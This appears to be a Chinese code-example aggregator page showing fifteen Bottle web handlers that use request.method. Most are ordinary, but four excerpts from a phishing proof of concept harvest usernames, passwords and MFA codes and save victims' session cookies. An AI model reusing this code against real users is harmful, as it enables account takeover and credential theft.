Python bottle.request 模块,method() 实例源码

我们从 Python 开源项目中提取了以下 15 个代码示例，用于说明如何使用 bottle.request.method 属性。

项目:cloud-custodian    作者:capitalone    | 项目源码 | 文件源码
def init_audit(log_group):
    """Create a decorator that emits an audit record before each handler call.

    The returned decorator wraps a handler whose first positional argument is
    ``account_id``.  On every call it builds an envelope containing a
    millisecond timestamp and a JSON message describing the current request,
    hands it to ``transport.send_group`` under the key
    ``"<log_group>=<account_id>"``, and then invokes the wrapped handler.
    """

    def audit(f):

        @functools.wraps(f)
        def handle(account_id, *args, **kw):
            # Read the clock first so the timestamp precedes request inspection.
            timestamp_ms = int(time.time() * 1000)
            details = {
                'user': request.environ.get('REMOTE_USER', ''),
                'url': request.url,
                'path': request.path,
                'method': request.method,
                'pid': os.getpid(),
                'account_id': account_id,
                'ip': request.remote_addr,
            }
            envelope = {
                'timestamp': timestamp_ms,
                'message': json.dumps(details),
            }
            group_key = "%s=%s" % (log_group, account_id)
            transport.send_group(group_key, [envelope])
            return f(account_id, *args, **kw)

        return handle

    return audit
项目:behave-web-api    作者:jefersondaniel    | 项目源码 | 文件源码
def echo():
    """Describe the current request as a plain dictionary.

    Returns:
        dict: ``method`` (the request method), ``headers`` (request headers
        copied into a dict), ``body`` (the request body decoded as UTF-8, or
        ``None`` when it cannot be read or decoded) and ``files`` (one
        ``{'key', 'name'}`` entry per uploaded file, where ``name`` is the
        upload's ``raw_filename``).
    """
    try:
        body = request.body.read().decode('utf-8')
    except Exception:
        # Best effort: an unreadable or non-UTF-8 body is reported as None.
        # Catching Exception (instead of a bare ``except``) lets
        # KeyboardInterrupt and SystemExit propagate.
        body = None

    return {
        'method': request.method,
        'headers': dict(request.headers),
        'body': body,
        'files': [
            {'key': key, 'name': request.files[key].raw_filename}
            for key in request.files
        ],
    }
项目:mfa_slipstream_poc    作者:decidedlygray    | 项目源码 | 文件源码
def dossologin():
    """Handle the username/password step.

    An ``OPTIONS`` request is answered with an empty dict.  Any other request
    reads ``username`` and ``pass`` from the decoded query string, prints and
    logs them, and returns whatever ``do_usernamepass_login`` returns.
    """
    if request.method != 'OPTIONS':
        params = request.query.decode()
        user_username = params['username']
        user_pass = params['pass']
        print('dossologin =======================================')
        print('User provided username: '+user_username)
        print('User provided password: '+user_pass)
        log('Username: '+str(user_username))
        log('Password: '+str(user_pass))
        return do_usernamepass_login(user_username, user_pass, global_driver)
    return {}

##########################################################################
# STAGE 2 - COLLECT MFA TOKEN OR ACCEPT NOTIFICATION
##########################################################################
项目:mfa_slipstream_poc    作者:decidedlygray    | 项目源码 | 文件源码
def checkload():
    """
    Polling endpoint reporting whether the driven browser has reached
    PROTECTED_RESOURCE.

    If the user doesn't have a sign in button, the phishing page will poll
    this to see if the page has been loaded.

    Returns an empty dict for OPTIONS requests, otherwise the string '1'
    when the driver's current URL equals PROTECTED_RESOURCE and '0' when it
    does not.
    """
    if request.method == 'OPTIONS':
        return {}
    else:
        currentURL = global_driver.current_url
        print('Current URL is: '+currentURL)
        if currentURL == PROTECTED_RESOURCE:
            return '1'
            # NOTE(review): the three statements below are unreachable because
            # of the return above. Confirm whether they were disabled on
            # purpose or are leftover dead code that should be removed.
            print('Saving creds and screenshot')
            time.sleep(3)
            quicksave()
        else:
            return '0'
项目:henet    作者:AcrDijon    | 项目源码 | 文件源码
def enable_cors(func):
    """Decorate a handler so every response carries permissive CORS headers.

    The wrapper sets ``Access-Control-Allow-Origin``, ``-Methods`` and
    ``-Headers`` on the current response.  For ``OPTIONS`` requests it stops
    there and returns ``None`` without calling ``func``; for every other
    method it returns ``func(*args, **kwargs)``.

    The wrapper keeps the metadata of ``func`` (``__name__``, ``__doc__``,
    ``__wrapped__``) so introspection and logging still see the real handler.
    """
    # Local import: the surrounding module is not guaranteed to import functools.
    import functools

    @functools.wraps(func)
    def _enable_cors(*args, **kwargs):
        hds = response.headers
        hds['Access-Control-Allow-Origin'] = '*'
        hds['Access-Control-Allow-Methods'] = ', '.join(['PUT', 'GET',
                                                         'POST', 'DELETE',
                                                         'OPTIONS'])
        allow = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'
        hds['Access-Control-Allow-Headers'] = allow
        if request.method != 'OPTIONS':
            return func(*args, **kwargs)
        # OPTIONS (preflight): the headers alone are the answer.
        return None
    return _enable_cors
项目:dd-trace-py    作者:DataDog    | 项目源码 | 文件源码
def apply(self, callback, route):
    """Return a wrapper around ``callback`` that traces each invocation.

    When ``self.tracer`` is falsy or not enabled the wrapper simply forwards
    to ``callback``.  Otherwise it opens a ``bottle.request`` span whose
    resource is ``"<method> <route rule>"``, optionally activates a context
    extracted from the request headers, and tags the span with status code,
    path and method once the callback finishes or raises.
    """

    def wrapped(*args, **kwargs):
        if not (self.tracer and self.tracer.enabled):
            return callback(*args, **kwargs)

        resource = "%s %s" % (request.method, request.route.rule)

        # Propagate headers such as x-datadog-trace-id.
        if self.distributed_tracing:
            context = HTTPPropagator().extract(request.headers)
            if context.trace_id:
                self.tracer.context_provider.activate(context)

        span_cm = self.tracer.trace(
            "bottle.request", service=self.service, resource=resource)
        with span_cm as span:
            status = 0
            try:
                return callback(*args, **kwargs)
            except Exception:
                # bottle doesn't always translate unhandled exceptions, so
                # we mark it here.
                status = 500
                raise
            finally:
                span.set_tag(http.STATUS_CODE, status or response.status_code)
                span.set_tag(http.URL, request.path)
                span.set_tag(http.METHOD, request.method)

    return wrapped
项目:PythonSkillTree    作者:w4n9H    | 项目源码 | 文件源码
def printer():
    """Render the print form, or the result page for a submitted form.

    Non-POST requests get the ``printer/print`` template with an empty
    message.  POST requests pass the ``text`` form field through
    ``Printer.show_string`` and render ``printer/index`` with the result.
    """
    if request.method != 'POST':
        return template('printer/print', message='')

    # Imported lazily, only when a form is actually submitted.
    from project.models.Printer import Printer
    renderer = Printer()
    message = renderer.show_string(request.forms.get('text'))
    return template('printer/index', message=message)
项目:aws-es-auth-proxy    作者:lucaagostini    | 项目源码 | 文件源码
def index():
    """Forward the incoming request to the configured AWS endpoint.

    The upstream URL is built from the configured protocol and endpoint plus
    the incoming path and query string.  Only request headers listed in
    ``PROXY_REQ_HEADERS_WHITELIST`` are forwarded, and the upstream call is
    authenticated with ``AWS4Auth``.  HEAD, GET, POST and PUT are supported;
    POST and PUT forward the request body.

    Returns:
        The Bottle ``response`` object.  For supported methods it carries the
        upstream body and every upstream header not listed in
        ``PROXY_RESP_HEADERS_BLACKLIST``.  For any other method it is a
        ``405 Method Not Allowed`` response.
    """
    auth = AWS4Auth(config.aws_service_credentials.access_key, config.aws_service_credentials.secret_key, config.aws_service_region, config.aws_service_name)
    endpoint = config.aws_service_protocol + "://" + config.aws_service_endpoint + request.path + "?" + request.query_string
    proxy_req_header = {
        header: request.headers[header]
        for header in request.headers
        if header.lower() in PROXY_REQ_HEADERS_WHITELIST
    }

    method = request.method
    if method == "HEAD":
        requests_response = requests.head(endpoint, auth=auth, headers=proxy_req_header)
    elif method == "GET":
        requests_response = requests.get(endpoint, auth=auth, headers=proxy_req_header)
    elif method == "POST":
        requests_response = requests.post(
            endpoint,
            auth=auth,
            data=request.body.getvalue(),
            headers=proxy_req_header)
    elif method == "PUT":
        requests_response = requests.put(
            endpoint,
            auth=auth,
            data=request.body.getvalue(),
            headers=proxy_req_header)
    else:
        # Previously this branch only logged and then fell through to code
        # that used the never-assigned ``requests_response``, raising
        # UnboundLocalError. Answer with an explicit 405 instead.
        logging.error("Method not allowed")
        response.status = 405
        response.set_header('Allow', 'HEAD, GET, POST, PUT')
        response.body = "Method not allowed"
        return response

    response.body = requests_response.content
    for header in requests_response.headers:
        if header.lower() not in PROXY_RESP_HEADERS_BLACKLIST:
            response.add_header(header, requests_response.headers[header])
    return response
项目:rill    作者:PermaData    | 项目源码 | 文件源码
def create_routes(host, port):
    """
    Register the registry routes; ``host`` and ``port`` are used to build
    the websocket address advertised by the runtime listing.
    """
    @route("/runtimes/", method=['OPTIONS', 'GET'])
    def get_registry():
        """
        Answer OPTIONS with the allowed methods, and GET with a JSON list
        holding the metadata of the rill runtime.
        """
        from rill.runtime import Runtime

        cors_headers = (
            ('Access-Control-Allow-Origin', '*'),
            ('Access-Control-Allow-Methods', 'GET, OPTIONS'),
            ('Allow', 'GET, OPTIONS'),
            ('Access-Control-Allow-Headers', 'Content-Type, Authorization'),
        )
        for header_name, header_value in cors_headers:
            response.set_header(header_name, header_value)

        if request.method == 'OPTIONS':
            return 'GET,OPTIONS'

        response.content_type = 'application/json'

        runtime_meta = Runtime().get_runtime_meta()
        address = 'ws://{}:{}'.format(host, port)
        runtime_meta['address'] = address
        runtime_meta['protocol'] = 'websocket'
        runtime_meta['id'] = 'rill_' + urlparse(address).netloc
        runtime_meta['seen'] = str(datetime.now())
        return json.dumps([runtime_meta])
项目:mfa_slipstream_poc    作者:decidedlygray    | 项目源码 | 文件源码
def domfa():
    """
    Handle the MFA-code step.

    An OPTIONS request is answered with an empty dict.  Any other request
    reads ``code`` from the decoded query string, prints it, passes it to
    do_mfa_code_entry together with the global driver, and returns 'Ok'.
    """
    if request.method != 'OPTIONS':
        params = request.query.decode()
        user_mfa_code = params['code']
        print('domfa =======================================')
        print('User provided MFA Auth Code: '+user_mfa_code)
        do_mfa_code_entry(user_mfa_code, global_driver)
        return 'Ok'
    return {}
项目:mfa_slipstream_poc    作者:decidedlygray    | 项目源码 | 文件源码
def quicksave():
    """Save the driver's cookies and a screenshot to disk for later use.

    Always returns the string '0x00000000'.
    """
    print('FLASHSAVE: Cookies and screenshot')
    mfa_cookies = global_driver.get_cookies()
    print('  flashsaving cookies: '+str(mfa_cookies))
    # Each file name gets its own get_timestamp() call, cookies first.
    cookie_file = 'cookies_'+get_timestamp()+'.txt'
    save_obj(mfa_cookies, cookie_file)  # load using add_cookies
    screenshot_file = 'saves/screenie'+get_timestamp()+'.png'
    global_driver.get_screenshot_as_file(screenshot_file)
    return '0x00000000'

##########################################################################
# BOTTLE CONFIGURATION/SETUP STUFF
##########################################################################
# Enable CORS - Future TODO: Communicate back to JavaScript auth method
#       and have the login portal properly set up auth method
# From: https://gist.github.com/richard-flosi/3789163
项目:xqz.es    作者:arahayrabedian    | 项目源码 | 文件源码
def contact(db):
    """
    Contact-us page: render the form for a GET request; for a POST request
    validate it, e-mail its contents to the admin address and redirect back
    with ``contacted=True``.  An invalid POST re-renders the form.
    """
    form = ContactForm(request.POST, nocaptcha={'ip_address': '127.0.0.1'})

    is_valid_post = request.method == 'POST' and form.validate()
    if not is_valid_post:
        # Plain page view (or failed validation): show the form again.
        contacted = strtobool(request.GET.get('contacted', 'false'))
        return template('contact', form=form, contacted=contacted)

    # The form is valid, captcha included: build the mail body.
    body_template = "Contact Email: {email}\n\n {contact_text}"
    message_text = body_template.format(
        email=form.email.data,
        contact_text=form.contact_text.data,
    )

    # Send through a gmail client authenticated as the admin account.
    gmail_client = GMail(settings.ADMIN_EMAIL, settings.ADMIN_EMAIL_PASSWORD)
    message = Message(
        '[xqzes] Contact Form',
        to=settings.ADMIN_EMAIL,
        text=message_text,
    )
    gmail_client.send(message)

    return redirect("/contact/?contacted=True")
项目:jerrybuild    作者:fboender    | 项目源码 | 文件源码
def generic_handler():
    """
    Catch-all handler for requests no other route claimed.

    Looks the request path up among the registered job webhook URLs.  When
    no job definition matches, aborts with a 404.  Otherwise it logs the
    request, builds the job environment, creates a job from the request body
    and puts it on the build queue.

    Returns immediately (async) with a dict containing the job id.
    """
    deps = request.deps
    jobdef_manager = deps['jobdef_manager']
    build_queue = deps['build_queue']
    config = deps['config']
    providers = deps['providers']

    jobdef = jobdef_manager.get_jobdef_from_url(request.path)
    if not jobdef:
        abort(404, "Not found")

    logging.info("Received event for job '{}'".format(jobdef.name))

    # Dump the details of the received request at debug level.
    debug = logging.debug
    debug("request environ: {}".format(request.environ))
    debug("request path: {}".format(request.path))
    debug("request method: {}".format(request.method))
    for header_name, header_value in request.headers.items():
        debug("request header: {}={}".format(header_name, header_value))
    for param_name, param_value in request.query.items():
        debug("request query: {}={}".format(param_name, param_value))
    debug("request body: {}".format(request.body.read()))
    debug("request auth: {}".format(request.auth))

    env = job.make_env(request, jobdef, providers)

    payload = request.body.read().decode('utf8')
    job_inst = jobdef.make_job(payload, env)
    build_queue.put(job_inst)

    return {'id': job_inst.id}
项目:bottle_beginner    作者:denzow    | 项目源码 | 文件源码
def talk_api():
    """
    Chat API endpoint.

    GET  -> returns the result of get_talk() serialised as JSON
    POST -> stores a new entry and returns a JSON status object

    json eg. (shape taken from the original notes; presumably what
    get_talk() yields -- confirm against its implementation)

    [
        {
            talk_time:2016-09-17 15:00:49.937402
            username:sayamada
            chat_data:...
        },
        {
            talk_time:2016-09-17 15:58:03.200027
            username:sayamada
            chat_data:...
        }
    ]

    :return: a JSON string, or None for any other request method
    """
    method = request.method

    if method == "POST":
        # getunicode() is used so the posted text arrives as unicode.
        chat_data = request.POST.getunicode("chat")
        # The author of the message is read from the "username" cookie.
        username = request.get_cookie("username")
        # The entry is stamped with the current server time.
        talk_time = datetime.now()
        save_talk(talk_time, username, chat_data)
        return json.dumps({
            "status": "success"
        })

    if method == "GET":
        return json.dumps(get_talk())
项目:xqz.es    作者:arahayrabedian    | 项目源码 | 文件源码
def submit(db):
    """Show the excuse submission form and store a valid submission.

    The form is always built from ``request.POST``.  When the request is a
    POST and the form validates, an ``Excuse`` built from the name and excuse
    fields is added to ``db``.  The ``submit`` template is rendered either
    way, with ``submitted`` telling it whether a record was stored.
    """
    name_length = validators.Length(
        min=3,
        max=50,
        message="Srsly, give us a decent username "
                "(%(min)d - %(max)d chars),"
                " doesn't even have to be real."
    )
    excuse_length = validators.Length(
        min=5,
        max=140,
        message="Please provide %(min)d - %(max)d "
                "characters"
    )

    # TODO: break this out along with others in to an excuses package.
    class SubmissionForm(Form):
        attribution_name = StringField(
            'Your Name (for future attribution purposes)',
            [validators.InputRequired(), name_length],
        )
        excuse = TextAreaField(
            "What's YOUR excuse !?!?",
            [excuse_length],
        )
        nocaptcha = NoCaptchaField(
            public_key=settings.RECAPTCHA_SITE_KEY,
            private_key=settings.RECAPTCHA_SECRET_KEY,
            secure=True,
        )

    form = SubmissionForm(request.POST, nocaptcha={'ip_address': '127.0.0.1'})

    is_valid_post = request.method == 'POST' and form.validate()
    if is_valid_post:
        record = Excuse(form.attribution_name.data, form.excuse.data)
        db.add(record)
    submitted = bool(is_valid_post)

    return template('submit', form=form, submitted=submitted)